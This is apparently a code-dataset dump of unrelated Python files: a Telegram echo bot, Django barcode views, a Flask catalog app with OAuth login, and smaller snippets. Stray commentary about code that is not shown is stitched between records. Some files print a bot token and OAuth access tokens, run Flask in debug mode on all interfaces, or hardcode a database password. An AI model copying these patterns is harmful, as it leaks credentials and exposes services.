mixture.wav2, 16000 )\r\n\tlibrosa.output.write_wav(folder+'male_estimated.wav',s1,16000)\r\n\tlibrosa.output.write_wav ( folder+'female_estimated.wav' ,s2,16000)\r\n\r\n\tprint ( 'male_sisdr:',male_sisdr )\r\n\tprint('sisdr between mixture and male sound:',male_o_sisdr)\r\n\tprint ( 'female_sisdr:',female_sisdr )\r\n\tprint ( 'sisdr between mixture and female sound:', female_o_sisdr 
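Aside on the plusOne solution above: it threads a carry from the right, writing digits via the ~idx trick (digits[~idx] is the idx-th digit from the end). Note that the original's sum / 10 is float division on Python 3; the integer form is //. A standalone restatement with checks:

def plus_one(digits):
    carry = 1
    for idx, num in enumerate(reversed(digits)):
        total = num + carry
        carry, digits[~idx] = total // 10, total % 10
    return [carry] + digits if carry else digits

assert plus_one([1, 2, 9]) == [1, 3, 0]
assert plus_one([9, 9]) == [1, 0, 0]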
)\r\n\r\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"477731180","text":"import os\r\n\r\nfrom flask import Flask, request\r\n\r\nimport telebot\r\n\r\nTOKEN = os.environ[\"telekey\"]\r\nURLHe = os.environ[\"herokuurl\"]\r\nprint(\"HOLa\")\r\nprint(TOKEN)\r\nbot = telebot.TeleBot(TOKEN)\r\nserver = Flask(__name__)\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start(message):\r\n bot.reply_to(message, 'Hola, ' + message.from_user.first_name)\r\n\r\n\r\n@bot.message_handler(func=lambda message: True, content_types=['text'])\r\ndef echo_message(message):\r\n bot.reply_to(message, message.text)\r\n\r\n\r\n@server.route('/'+TOKEN, methods=['POST'])\r\ndef getMessage():\r\n bot.process_new_updates([telebot.types.Update.de_json(request.stream.read().decode(\"utf-8\"))])\r\n return \"!\", 200\r\n\r\n\r\n@server.route(\"/\")\r\ndef webhook():\r\n bot.remove_webhook()\r\n bot.set_webhook(url=URLHe+TOKEN)\r\n return \"!\", 200\r\n\r\n\r\nif __name__ == \"__main__\":\r\n server.run(host=\"0.0.0.0\", port=int(os.environ.get('PORT', 5000)),debug=True)","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"650908262","text":"\"\"\"\nG'DAY default control flags\n\nRead into the model unless the user changes these at runtime with definitions\nin the .INI file\n\n\"\"\"\n\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (05.09.2011)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nalloc_model = \"fixed\" # C allocation -> fixed or allometric\nassim_model = \"mate\" # bewdy or mate?\nnuptake_model = 1 # 0=constant uptake, 1=func of N inorgn, 2=depends on rate of soil N availability\ntrans_model = 1 # 0=trans from WUE, 1=Penman-Monteith, 2=Priestley-Taylor\nfixleafnc = False # fixed leaf N C ?\npassiveconst = False # hold passive pool at passivesoil\nprint_options = \"daily\" # \"daily\"=every timestep, \"end\"=end of run\ngrazing = False # Is foliage grazed?\nuse_eff_nc = 0 # use constant leaf n:c for metfrac s\nstrfloat = 0 # Structural pool input N:C varies=1, fixed=0\nuse_leuning = 0 \nfixed_stem_nc = True # False=vary stem N:C with foliage, True=fixed stem N:C\ndeciduous_model = False # evergreen_model=False, deciduous_model=True\ncalc_sw_params = False # false=user supplies field capacity and wilting point, true=calculate them based on cosby et al.\nwater_stress = True # water stress modifier turned on=1 (default)...ability to turn off to test things without drought stress = 0\nmodeljm = True # modeljm=0, Jmax and Vcmax parameters are read in, modeljm=1, parameters are calculated from leaf N content\nmodel_optroot = False # Ross's optimal root model...not sure if this works yet...0=off, 1=on\nsw_stress_model = 1 # JULES type linear stress func, or Landsberg and Waring non-linear func\nps_pathway = \"c3\" # Photosynthetic pathway, c3/c4\n","sub_path":"build/lib/gday/default_control.py","file_name":"default_control.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"28511753","text":"class Solution(object):\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: no return\n \"\"\"\n if not head or not head.next:\n return\n dummy = ListNode(0)\n middle = self.findMedian(head)\n low, middle.next = 
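Aside on eval_sisnr above: it projects the estimate onto the reference, s_target = (<s_hat, s> / <s, s>) * s, and returns 10*log10 of target energy over residual energy. Two quick numeric sanity checks with NumPy (a perfect estimate is capped at a very large value by eps; 10% added noise lands near 20 dB):

import numpy as np

def si_snr(s_hat, s, eps=np.finfo(np.float32).eps):
    s_target = (np.dot(s_hat, s) / np.dot(s, s)) * s
    e = s_hat - s_target
    return 10 * np.log10(max(np.dot(s_target, s_target), eps) / max(np.dot(e, e), eps))

rng = np.random.default_rng(0)
s = rng.standard_normal(16000)
print(si_snr(s, s))                                      # very large (eps-capped)
print(si_snr(s + 0.1 * rng.standard_normal(16000), s))   # roughly 20 dB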
middle.next, None\n        low = self.reverse(low)\n        while head and low:\n            dummy.next = head\n            head = head.next\n            dummy.next.next = low\n            low = low.next\n            dummy = dummy.next.next\n        if head:\n            dummy.next = head\n    def findMedian(self, head):\n        slow, fast = head, head.next\n        while fast and fast.next:\n            slow = slow.next\n            fast = fast.next.next\n        return slow\n    def reverse(self, head):\n        pre = None\n        while head:\n            tmp = head.next\n            head.next = pre\n            pre = head\n            head = tmp\n        return pre\n","sub_path":"Reorder_List/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"208888219","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpRequest\nfrom .models import *\nfrom django.views.decorators.csrf import csrf_exempt\nimport barcode\nfrom barcode.writer import ImageWriter\nfrom barcode import Code128\nfrom pyzbar.pyzbar import decode\nfrom PIL import Image\nfrom pdf417 import encode, render_image, render_svg\n\n# Create your views here.\n\n\ndef showlist(request):\n    if request.method == \"POST\":\n        brand = request.POST['brand']\n        category = request.POST['category']\n        model = request.POST['model']\n        type = request.POST['type']\n        size = request.POST['size'] \n        b_id = '00' + brand\n        b = (b_id[-2:])\n        print(b)\n        c_id = '000' + category\n        c = (c_id[-3:])\n        print(c)\n        m_id = '00' + model\n        m = (m_id[-2:])\n        print(m)\n        t_id = '000' + type\n        t = (t_id[-3:])\n        print(t)\n        s_id = '000' + size\n        s = (s_id[-2:])\n        print(s)\n        out = b + c + m + t + s \n        \"\"\" print(out) \"\"\"\n        \"\"\" a = barcode.get_barcode_class('code128')\n        b = a(out, writer=ImageWriter())\n        c = b.save('filename') \"\"\"\n        EAN = barcode.get_barcode_class('ean13')\n        ean = EAN(f'{b}{c}{m}{t}{s}', writer=ImageWriter())\n        d = ean.save('bar')\n\n        img = Image.open('bar.png')\n        result = decode(img)\n        for i in result:\n            num = []\n            print(i.data.decode(\"utf-8\"))\n            num.append(i.data.decode(\"utf-8\"))\n\n        string = (num[0])\n        print(string)\n        brand_match = int(string[0:2])\n        category_match = int(string[2:5])\n        model_match = int(string[5:7])\n        type_match = int(string[7:10])\n        size_match = int(string[10:12])\n        print(brand_match)\n        print(category_match)\n        print(model_match)\n        print(type_match)\n        print(size_match) \n        br = Brand.objects.get(pk=brand_match)\n        print(br.brand)\n        ca = Category.objects.get(pk=category_match)\n        print(ca.category)\n        mo = Model.objects.get(pk=model_match)\n        print(mo.model)\n        ty = Type.objects.get(pk=type_match)\n        print(ty.type)\n        si = Size.objects.get(pk=size_match)\n        print(si.size)\n\n        \n        \"\"\" buffer = BytesIO()\n        ean.write(buffer)\n        self.barcode.save('bar.png', File(buffer), save=False) \"\"\"\n        return redirect('showlist')\n    \n    results = Brand.objects.all()\n    category = Category.objects.all()\n    model = Model.objects.all()\n    type = Type.objects.all()\n    size = Size.objects.all()\n    context = {'results':results, 'category':category, 'model':model, 'type':type, 'size':size}\n    return render(request, 'templates/home.html', context)\n\n    \"\"\" def readlist(request):\n        img = Image.open('barcode.png'\n        result = decode(img)\n        print(result)\n        for i in result:\n            print(i.data.decode(\"utf-8\")) \"\"\"\n    \n    \"\"\" s1 = 0\n    s2 = 10\n\n    def createlist(s1, s2):\n        return [item for item in range(s1, s2)]\n    results = ((createlist(s1, s2)))\n    results = [str(i) for i in results]\n    for item in results:\n        codes = 
encode(str(item), columns=3, security_level=2)\n            image = render_image(codes, scale=5, ratio=2, padding=5, fg_color=\"Indigo\", bg_color=\"#ddd\") # Pillow Image object\n            image.save('barcode.jpg') \"\"\"\n\n    ","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"176417250","text":"import sys\nfrom art import text2art as ascii\nfrom metroid_utils import *\nfrom metroid_config import *\nfrom data.objects import *\nfrom data.battle import *\n\ntype(ascii(\"METROID\"),textspeed_menu_art)\n\ntype('1. New Game',textspeed_menu)\ntype('2. Load Game',textspeed_menu)\n\ntype(\"Press the corresponding key for an option, then hit enter to confirm.\",textspeed_menu)\n\nmenuoption = input(\"> \").upper()\nprint()\n\nif menuoption == '1':\n    type(\"Starting New Game...\", textspeed_menu)\n    Samus = Player()\n    while True:\n        encounter(Samus)\n        input(\"> \")\n        print()\nelif menuoption == '2':\n    type(\"Locate the path of your save file.\", textspeed_menu)\nelse:\n    type(\"Quitting...\", textspeed_menu)\n    sys.exit()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"294835335","text":"#!/usr/bin/env python3\n\nimport os\n\nfrom flask import Flask\nfrom flask import render_template, request, redirect, jsonify, url_for, flash\n# File upload import here\nfrom flask import send_from_directory\nfrom werkzeug.utils import secure_filename\nfrom datafrica.file_organizer import allowed_file, delete_image\nfrom sqlalchemy.orm.exc import NoResultFound\n\n# Add database imports here\nfrom sqlalchemy import create_engine, asc, desc, literal, func\nfrom sqlalchemy.orm import sessionmaker\nfrom datafrica.database_setup import Base, Category, Item, User\n\n# NEW IMPORTS FOR THIS STEP\nfrom flask import session as login_session\n# As keyword b/c we already used the variable session\n# in my database sqlalchemy.\nimport random\nimport string\n\n# IMPORTS FOR THIS STEP (oauth server side)\nfrom oauth2client import client\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nfrom flask import make_response\nimport requests\n\nUPLOAD_FOLDER = '/var/www/datafrica/datafrica/uploads'\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n# DECLARE MY CLIENT ID BY REFERENCING THE CLIENT SECRETS FILE\nAPP_PATH = '/var/www/datafrica/datafrica/'\nclient_id = json.loads(\n    open(APP_PATH + 'client_secrets.json', 'r').read())['web']['client_id']\n\nAPPLICATION_NAME = \"Catalog App\"\n\n# Make an instance of create engine\n# engine = create_engine ('sqlite:///catalog.db')\nengine = create_engine('postgresql://datafrica:password@localhost/datafrica')\n# Bind the engine to the metadata of the Base class\n# To establish conversation with the database and act as staging zone\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\n\n# Create DB session instance\nsession = DBSession()\n\n@app.route('/')\n@app.route('/index')\ndef showIndex():\n    return render_template(\"index.html\")\n\n\n# Create anti-forgery state token\n@app.route('/login')\ndef 
showLogin():\n    # This method creates a unique session token. This token is sent alongside\n    # the one-time code sent by google via GET request sent to\n    # localhost:8000/login.\n    state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n                    for x in range(32))\n    # state is a random mixed 32 character long string.\n    # Store state from our login_session(a dict)\n    # in a variable state.\n    login_session['state'] = state\n    # return \"The current session state is %s\" %login_session['state']\n    # to see what the current state looks like. STATE is sent back with oauth.\n    return render_template('login.html', STATE=state)\n\n# HANDLER OF CODE SENT BACK FROM CALLBACK METHOD - one time code from google\n@app.route('/gconnect', methods=['GET', 'POST'])\ndef gconnect():\n    # Call request args get for my code to examine the state\n    # token passed in and compare it to the state of the login session.\n    if request.args.get('state') != login_session['state']:\n        # If there is a mismatch\n        response = make_response(json.dumps('invalid state token'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    # If there is a match\n    # Obtain authorization code from my server with request data function\n    # Request is variable that holds data and information about code\n    code = request.data\n\n    try:\n        # Upgrade the authorization code into a credentials object\n        oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n        oauth_flow.redirect_uri = 'postmessage'\n        # Access all credentials including access code.\n        credentials = oauth_flow.step2_exchange(code)\n        # retrieve only the access token in json format.\n        access_token = credentials.access_token\n    # If an error happens along the way\n    except FlowExchangeError:\n        response = make_response(json.dumps(\n            'Failed to upgrade the authorization code.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Append this token to the following url (no whitespace is allowed in the query string)\n    url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n           % access_token)\n    # Create a json GET request with these two lines,\n    # containing the url and access_token\n    h = httplib2.Http()\n    result = json.loads((h.request(url, 'GET')[1]).decode('utf-8'))\n\n    if result.get('error') is not None:\n        response = make_response(json.dumps(result.get('error')), 500)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Verify that the access token is used for the intended user.\n    # Only the id_token part is extracted from the credentials object.\n    gplus_id = credentials.id_token['sub']\n    if result['user_id'] != gplus_id:\n        response = make_response(\n            json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Verify that the access token is valid for this app.\n    if result['issued_to'] != client_id:\n        response = make_response(\n            json.dumps(\"token's client ID does not match the app's.\"), 401\n        )\n        print(\"Token's client ID does not match app's.\")\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Check to see if the user is already logged in\n    stored_access_token = login_session.get('access_token')\n    stored_gplus_id = login_session.get('gplus_id')\n    if stored_access_token is not None and gplus_id == stored_gplus_id:\n        response = make_response(json.dumps(\n            'Current user is already connected.'), 200)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Store the access token in the 
session for later use.\n    login_session['access_token'] = credentials.access_token\n    login_session['gplus_id'] = gplus_id\n\n    # Get user info\n    userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n    params = {'access_token': credentials.access_token, 'alt': 'json'}\n    answer = requests.get(userinfo_url, params=params)\n\n    data = answer.json()\n\n    login_session['username'] = data['name']\n    login_session['picture'] = data['picture']\n    login_session['email'] = data['email']\n\n    # see if user exists, if it doesn't make a new one.\n    # Get user id on the email address stored in our log-in session\n    # stored in the variable user_id.\n    user_id = getUserID(login_session['email'])\n    if not user_id:\n        user_id = createUser(login_session)\n    login_session['user_id'] = user_id\n\n    output = ''\n    output += '<h1>Welcome, '\n    output += login_session['username']\n    output += '!</h1>'\n    output += '<img src=\"'\n    output += login_session['picture']\n    output += ' \" style = \"width: 300px; height: 300px;\\\n    border-radius: 150px;-webkit-border-radius: \\\n    150px;-moz-border-radius: 150px;\"> '\n    flash(\"you are now logged in as %s\" % login_session['username'])\n    print(\"done!\")\n    return output\n\n# DISCONNECT - Revoke a current user's token and reset their login_session\n@app.route('/gdisconnect')\ndef gdisconnect():\n    \"\"\"This method revokes a current user's token\"\"\"\n\n    access_token = login_session.get('access_token')\n    if access_token is None:\n        print('Access Token is None')\n        response = make_response(json.dumps(\n            'Current user not connected.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    print('In gdisconnect access token is %s' % access_token)\n    print('User name is: ')\n    print(login_session['username'])\n    url = ('https://accounts.google.com/o/oauth2/revoke?token=%s'\n           % login_session['access_token'])\n    h = httplib2.Http()\n    result = h.request(url, 'GET')[0]\n    print('result is ')\n    print(result)\n    if result['status'] == '200':\n        del login_session['access_token']\n        del login_session['gplus_id']\n        del login_session['username']\n        del login_session['email']\n        del login_session['picture']\n        response = make_response(json.dumps('Successfully disconnected.'), 200)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    else:\n        response = make_response(json.dumps(\n            'Failed to revoke token for given user.'), 400)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n\n# FACEBOOK SIGN IN\n@app.route('/fbconnect', methods=['GET', 'POST'])\ndef fbconnect():\n    if request.args.get('state') != login_session['state']:\n        response = make_response(json.dumps('Invalid state parameter.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    access_token = request.data\n    print(\"access token received %s \" % access_token)\n    # Below, exchange the short-lived token for a long-lived server side token\n    # with GET /oauth/access_token?grant_type=fb_exchange_token&client_id=\n    # {app-id}&client_secret={app-secret}&fb_exchange_token={short-lived-token}\n    app_id = json.loads(open('fb_client_secrets.json', 'r').read())[\n        'web']['app_id']\n    # send my app secret to Facebook to verify my identity.\n    app_secret = json.loads(\n        open('fb_client_secrets.json', 'r').read())['web']['app_secret']\n    url = ('https://graph.facebook.com/v5.0/oauth/access_token'\n           '?grant_type=fb_exchange_token'\n           '&client_id=%s&client_secret=%s&fb_exchange_token=%s'\n           % (app_id, app_secret, access_token))\n    h = httplib2.Http()\n    result 
= h.request(url, 'GET')[1]\n    # Use token to get user info from API\n    userinfo_url = \"https://graph.facebook.com/v5.0/me\"\n    '''\n    Due to the formatting for the result from the server token\n    exchange we have to split the token first on commas\n    and select the first index which gives us the key :\n    value for the server access token then we split it\n    on colons to pull out the actual token value\n    and replace the remaining quotes with nothing so\n    that it can be used directly in the graph api calls\n    '''\n    token = result.split(',')[0].split(':')[1].replace('\"', '')\n\n    url = ('https://graph.facebook.com/v5.0/me'\n           '?access_token=%s&fields=id,name,email' % token)\n\n    h = httplib2.Http()\n    result = h.request(url, 'GET')[1]\n    # print \"url sent for API access:%s\"% url\n    # print \"API JSON result: %s\" % result\n    data = json.loads(result)\n    login_session['provider'] = 'facebook'\n    login_session['username'] = data[\"name\"]\n    login_session['email'] = data[\"email\"]\n    login_session['facebook_id'] = data[\"id\"]\n\n    # The token must be stored in the login_session in order to properly logout\n    login_session['access_token'] = token\n\n    # Get user picture\n    url = ('https://graph.facebook.com/v2.8/me/picture'\n           '?access_token=%s&redirect=0&height=200&width=200' % token)\n    h = httplib2.Http()\n    result = h.request(url, 'GET')[1]\n    data = json.loads(result)\n\n    login_session['picture'] = data[\"data\"][\"url\"]\n\n    # see if user exists\n    user_id = getUserID(login_session['email'])\n    if not user_id:\n        user_id = createUser(login_session)\n    login_session['user_id'] = user_id\n\n    # Welcome splash screen\n    output = ''\n    output += '<h1>Welcome, '\n    output += login_session['username']\n\n    output += '!</h1>'\n    output += '<img src=\"'\n    output += login_session['picture']\n    output += ' \" style = \"width: 300px; height: \\\n        300px;border-radius: 150px;-webkit-border-radius: \\\n        150px;-moz-border-radius: 150px;\"> '\n\n    flash(\"Now logged in as %s\" % login_session['username'])\n    return output\n\n\n@app.route('/fbdisconnect')\ndef fbdisconnect():\n    facebook_id = login_session['facebook_id']\n    # The access token must be included to successfully logout\n    access_token = login_session['access_token']\n    url = ('https://graph.facebook.com/%s/permissions?access_token=%s'\n           % (facebook_id, access_token))\n    h = httplib2.Http()\n    result = h.request(url, 'DELETE')[1]\n    del login_session['username']\n    del login_session['email']\n    del login_session['picture']\n    del login_session['user_id']\n    del login_session['facebook_id']\n    return \"you have been logged out\"\n\n#####\n# LOCAL PERMISSION SYSTEM\n# User Helper Functions\n# Local permission system, leverages the information\n# stored in the log in session object, and uses the server side logic\n# in the database to control the user experience based on\n# provided credential. 
To implement LPS, our database has\n# to start storing information in a more user-specific manner.\n# We need a table of users, so we can identify what data belongs to whom.\n# This step includes work on lotsofitems as well.\n\n\n# createUser takes in login_session as input\ndef createUser(login_session):\n    \"\"\"create new user in our database, extracting all\n    the fields necessary to populate it from information\n    gathered from the login_session\"\"\"\n\n    newUser = User(\n        name=login_session['username'],\n        email=login_session['email'],\n        picture=login_session['picture'])\n    session.add(newUser)\n    session.commit()\n    user = session.query(User).filter_by(email=login_session['email']).one()\n    # Then returns a user_id of the new user created\n    return user.id\n\n\ndef getUserInfo(user_id):\n    \"\"\"If a user ID is passed into this method,\n    it simply returns the user object associated with this ID number.\"\"\"\n\n    user = session.query(User).filter_by(id=user_id).one()\n    # Returns user object associated with this number.\n    return user\n\n\ndef getUserID(email):\n    \"\"\"This method takes an email address and returns an ID,\n    if that email address belongs to a user stored in our database\"\"\"\n\n    try:\n        user = session.query(User).filter_by(email=email).one()\n        # Returns an ID number if the email address belongs to\n        # a user stored in our database.\n        return user.id\n    except NoResultFound:\n        # If not, it returns None.\n        return None\n\n# END OF LOCAL PERMISSION\n\n\n# JSON APIs to view Catalog Information\n@app.route('/catalog/json')\ndef catalogJSON():\n    categories = session.query(Category).all()\n    return jsonify(Category=[i.serialize for i in categories])\n\n\n@app.route('/catalog/items/json')\ndef itemsJSON():\n    items = session.query(Item).all()\n    return jsonify(Items=[i.serialize for i in items])\n\n\n@app.route('/catalog/<category_name>/<int:category_id>/<item_title>\\\n/<int:item_id>/json')\ndef productItemJSON(category_name, category_id, item_title, item_id):\n    Product_Item = session.query(Item).filter_by(\n        title=item_title).one_or_none()\n    return jsonify(Product_Item=Product_Item.serialize)\n\n\n\n# Show all Categories and latest Item-list associated with them\n@app.route('/catalog/')\ndef showCatalog():\n    # Add SQLAlchemy statements\n    \"\"\"Show the index page displaying the categories and\n    latest 20 items added to the database.\n    \"\"\"\n    # To protect each category or\n    # item based on whoever created it.\n    categories = session.query(Category).all()\n\n    # result[::-1] returns the slice of every element of result in reverse\n    latestItems = session.query(Item).order_by(desc(Item.id))[0:20]\n\n    # If there is a username value in the login_session, we would\n    # render one template or the other.\n    # If a user isn't logged in or isn't the original creator\n    if 'username' not in login_session:\n        return render_template('index.html')\n    else:\n        return render_template(\n            'catalog.html',\n            categories=categories,\n            latestItems=latestItems,\n            # A parameter for conditional login/out\n            login_session=login_session)\n\n\n# \"Show item-list associated with a specific category\n@app.route('/catalog/<category_name>/<int:category_id>/items')\ndef showCategory(category_name, category_id):\n    # Add SQLAlchemy statements\n    \"\"\"Takes in a specified category_name and returns\n    the items associated with it. 
Renders a web page\n showing all the categories on one side and the items\n on the other side of the page.\n \"\"\"\n # NOTE IMPORTANT!\n # In other to handle cases where requested items does not exist,\n # in the database. As it is, if you access the\n # URL: http://localhost:8000/catalog/Frisbee/10/Joylight/250000/.\n # The .one() method in filter_by will return:\n # sqlalchemy.orm.exc.NoResultFound\n # NoResultFound: No row was found for one ()\n # A better way to do that would be using one_or_none().\n # This function returns an object NoneType if it doesn't\n # exist and then you do a PageNotFound when the object is None.\n try:\n category = session.query(Category).\\\n filter_by(id=category_id).one_or_none()\n except None:\n return PageNotFound\n\n categories = session.query(Category).all()\n items = session.query(Item).filter_by(\n category=category).order_by(asc(Item.title))\n # # return count of item \"id\" grouped by category_id\n categoryItems = session.query(func.count(\n Item.id)).filter_by(\n category_id=category.id).one()\n\n # # If a user isn't logged in or isn't the original creator, we would\n # render one template or the other. # Decide which page to show,\n # index or category.html\n if 'username' not in login_session:\n return redirect('/login')\n else:\n return render_template(\n 'category.html',\n categories=categories,\n category=category,\n items=items,\n categoryItems=categoryItems)\n\n\n# Role required - creator\n@app.route('/catalog/create', methods=['GET', 'POST'])\ndef newCategory():\n \"\"\" Renders a form for input of a new Category - GET request.\n if I get a post -redirect to 'showCatalog' after creating\n new Category info.\n \"\"\"\n # ADD LOGIN PERMISSION\n # If a username is not detected for a given request.\n # Lets redirect to login page.\n if 'username' not in login_session:\n return redirect('/login')\n # Create an if statement that looks for a post request.\n # By calling request method\n if request.method == 'POST':\n # Extract the name field from my form. .get used b/c of bad request key\n newCategory = Category(\n name=request.form['name'],\n user_id=login_session.get('user_id'))\n session.add(newCategory)\n session.commit()\n flash('New Category %s Successfully \\\n Created' % newCategory.name)\n # To redirect my user back to the main page.\n # I can use a helper function\n # Url for takes the name of the function as the first arg,\n # and a number of key args, each corresponding to the variable\n # part of the URL rule.\n return redirect(url_for('showCatalog'))\n else:\n # If my server did not receive a post request, it will go ahead\n # and render the template for the new HTML template that i created.\n return render_template('newcategory.html')\n\n\n# Role required -employee creator\n@app.route('/catalog/<category_name>/<int:category_id>\\\n/edit', methods=['GET', 'POST'])\ndef editACategoryName(category_name, category_id):\n \"\"\"1. First execute a query to find the exact item we want\n to update: Find entry and store it in a variable\n 2. Next Reset values: we declare the new name of\n the variable\n 3. Next we add the variable to our session\n 4. 
Finally we commit the session to the database\n    \"\"\"\n    # Execute a query to find the category and store it in\n    # a variable editedCategory.\n    try:\n        categoryToEdit = session.query(Category).\\\n            filter_by(id=category_id).one_or_none()\n    except None:\n        return PageNotFound\n\n    # ADD LOGIN PERMISSION\n    # Protect app modification from non-users\n    # If a username is not detected for a given request.\n    # Lets redirect to login page.\n    if 'username' not in login_session:\n        return redirect('/login')\n    # Verify that a user is logged in by\n    # checking if the username has a variable filled in\n    # If a user isn't logged in \"Alert message\"\n    if categoryToEdit.user.id != login_session['user_id']:\n        return \"<script>function myFunction() {alert( 'You are not\\\n        authorized to edit this category.');}\\\n        </script><body onload='myFunction()'>\"\n\n    # Create an if statement that looks for a post request.\n    # By calling request method\n    if request.method == 'POST':\n        # Then create an if statement that looks for a name in the form.\n        # By calling request form get.\n        if request.form['name']:\n            # Now reset the name of the category to the new name from the form\n            categoryToEdit.name = request.form['name']\n            # To edit, you don't need to add it again.\n            session.commit()\n            flash('Category successfully edited %s' % categoryToEdit.name)\n            # Redirect the user back to the home page.\n            return redirect(url_for('showCatalog'))\n    else:\n        return render_template(\n            'editacategoryname.html',\n            category=categoryToEdit)\n\n\n# Role required - employee creator\n@app.route('/catalog/<category_name>/<int:category_id>\\\n/delete', methods=['GET', 'POST'])\ndef deleteCategory(category_name, category_id):\n    # Execute a query to find the category and store it in a variable.\n    try:\n        categoryToDelete = session.query(Category).\\\n            filter_by(id=category_id).one_or_none()\n    except None:\n        return PageNotFound\n    creator = getUserInfo(categoryToDelete.user_id)\n\n    # ADD LOGIN PERMISSION\n    # If a user name is not detected for a given request.\n    # Lets redirect to login page.\n    if 'username' not in login_session:\n        return redirect('/login')\n    # To protect each item based on whoever created it.\n    # If a user isn't logged in or isn't the original creator\n    if categoryToDelete.user.id != login_session['user_id']:\n        # The script gives not only an alert that you are not,\n        # but also we stay where we are right here.\n        return \"<script>function myFunction() {alert('You are not\\\n        authorized to delete this category.\\\n        Please create your own category in order\\\n        to edit categories.');}</script><body onload='myFunction()'>\"\n\n    # Create an if statement that looks for a post request.\n    # By calling request method\n    if request.method == 'POST':\n        session.delete(categoryToDelete)\n        session.commit()\n        flash('%s Successfully Deleted' % categoryToDelete.name)\n        return redirect(url_for('showCatalog'))\n    else:\n        return render_template('deletecategory.html',\n                               category=categoryToDelete, creator=creator)\n\n@app.route('/catalog/myitems/')\ndef showUserItems():\n    \"\"\"If logged in, show the user the items they have added.\"\"\"\n    if 'username' not in login_session:\n        return redirect('/login')\n\n    user_id = getUserID(login_session['email'])\n\n    categories = 
session.query(Category).all()\n    items = session.query(Item).filter_by(user_id=user_id).all()\n\n    if not items:\n        flash(\"You haven't added any items yet.\")\n        return redirect(url_for('showCatalog'))\n\n    return render_template('useritems.html',\n                           categories=categories,\n                           items=items)\n\n\n# \"This page is the Item for %s\" % item_id\n@app.route('/catalog/<category_name>/<int:category_id>/<item_title>/<int:item_id>/')\n#@login_required\ndef showItem(category_name, category_id, item_title, item_id):\n    # Add SQLAlchemy statements\n    \"\"\"Renders product information web page of an item.\n    \"\"\"\n    try:\n        category = session.query(Category).\\\n            filter_by(id = category_id).one_or_none()\n\n    except None: # If a NoneType object is returned\n        return PageNotFound\n\n    try:\n        item = session.query(Item).filter_by(id = item_id).one_or_none()\n    except None: # If a NoneType object is returned\n        return PageNotFound\n\n    creator = getUserInfo(item.user_id)\n\n    # If there is a username value in the login_session, we would\n    # render one template or the other.\n    if 'username' not in login_session:\n        return redirect('/login')\n    # Decide which page should be visible to the public\n    # And which one should be private\n    else:\n        return render_template('item.html',\n                               category = category,\n                               item = item,\n                               creator = creator)\n\n\n# Role required: User- creator\n# \"This page will be for adding a new Item\"\n@app.route('/catalog/new', methods = ['GET', 'POST'])\n#@login_required\ndef newItem():  # Add an item based on category name.\n    \"\"\" Renders a form for input of a new item - GET request. if I get a post -redirect to 'showItem' after creating new item.\n    \"\"\"\n    # ADD LOGIN PERMISSION\n    # Protect app modification from non-users\n    # If a username is not detected for a given request.\n    # Lets redirect to login page.\n\n    if 'username' not in login_session:\n        return redirect('/login')\n\n    categories = session.query(Category).all()\n\n    # Add SQLAlchemy statements\n    if request.method == 'POST':\n        # This is key to retrieving the category from the form.\n        try:\n            category = (session.query(Category).filter_by(\n                name= request.form.get('category')).one_or_none())\n        except None:# If a NoneType object is returned\n            return PageNotFound\n\n        newItem = Item(category = category,\n                       title = request.form['title'],\n                       description = request.form['description'],\n                       price = request.form['price'],\n                       user_id=login_session['user_id'])\n        # access the file from the files dictionary\n        # on request object:\n        #file = request.files['file']\n\n        # Process optional item image.\n        image_file =request.files['file']\n        if image_file and allowed_file(image_file.filename):\n            filename = secure_filename(image_file.filename)\n            if os.path.isdir(app.config['UPLOAD_FOLDER']) is False:\n                os.mkdir(app.config['UPLOAD_FOLDER'])\n            image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            newItem.image_filename = filename\n        elif request.form['basic_url']:\n            newItem.basic_url = request.form['basic_url']\n\n        session.add(newItem)\n        session.commit()\n        flash('New Item %s successfully Created' % newItem.title)\n        # Now define the url variable path to the newItem created.\n        # Show response to my post request in the client.\n        